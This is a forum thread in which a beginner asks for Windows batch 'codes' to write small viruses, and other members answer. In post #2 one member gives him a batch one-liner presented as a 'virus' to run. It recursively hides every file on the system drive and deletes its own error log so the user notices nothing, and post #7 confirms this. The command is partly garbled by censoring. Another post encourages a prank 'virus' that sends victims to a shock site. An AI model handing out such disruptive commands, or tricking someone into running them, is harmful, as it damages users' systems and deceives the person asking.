file access
+ Reply to Thread
Results 1 to 11 of 11

Thread: Notepad

Hybrid View

  1. #1
    Join Date
    Aug 2007
    Posts
    4

    Notepad

    Hey guys, I'm a new to this stuff are there any websites that tell you codes for notepad. I.E
    @echo off
    Start iexplore
    That opens IE. Sorry If this isnt clear I just want to mess around and work out for my self to make some easy small virus as I'm just learning.
    I've already made a few, but thanks.

  2. #2
    Join Date
    Jan 2005
    Posts
    623
    Codes for IE huh? Made a few viruses? hm... Heres a ***7 virus you can put into notepad just for you:

    Code:
    attrib +h &#*7;systemdrive%\* /S /D > %systemdrive%\***7H4X0R.txt&& IF EXIST %systemdrive%\***7H4X0R.txt DEL /Q %systemdrive%\***7H4X0R.txt
    Its only for butters computer. No one else should try to run it.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  3. #3
    Join Date
    Sep 2006
    Posts
    1,649
    What your trying to make isn't a virus, it's more of a worm, and I don't think anyone wants to help you make that.

    Oh, and what your talking about is called a batch file.

  4. #4
    Join Date
    Jan 2005
    Posts
    623
    I know, I thought that was a bit funny. I made a virus!! echo off&& start iexplore.exe. He didnt even send it to a web address.

    start iexplore.exe [url]http://www.all-nettools.com[/url]

    You can do that with any program as long as you add it to your computers PATH which is located in the ENVIRONMENTAL VARIABLES.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  5. #5
    Join Date
    Aug 2007
    Posts
    4
    I'm not calling it a virus thats an example of what I want. Like a website that will give you a code then tell you what it does.

  6. #6
    Join Date
    Sep 2006
    Posts
    1,649
    Butter, just make a 'virus' that sends the person to meatspin.com or something. Also, don't forget that the target might be using Opera or Firefox as their web browser, so start iexplorer.exe might not work. Or just do a little bit of research and custom code your virus to do what you want

    @ SyntaX - Something about that code you posted makes me not want to run it...

  7. #7
    Join Date
    Jan 2005
    Posts
    623
    LoL @ Moonbat

    Well its only a set universal batch commands that I whipped up. It will set all your files on your main system drive to hidden. It also echo's all errors to ***7H4X0R.txt, then deletes ***7H4X0R.txt so the user does not see any errors.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

+ Reply to Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts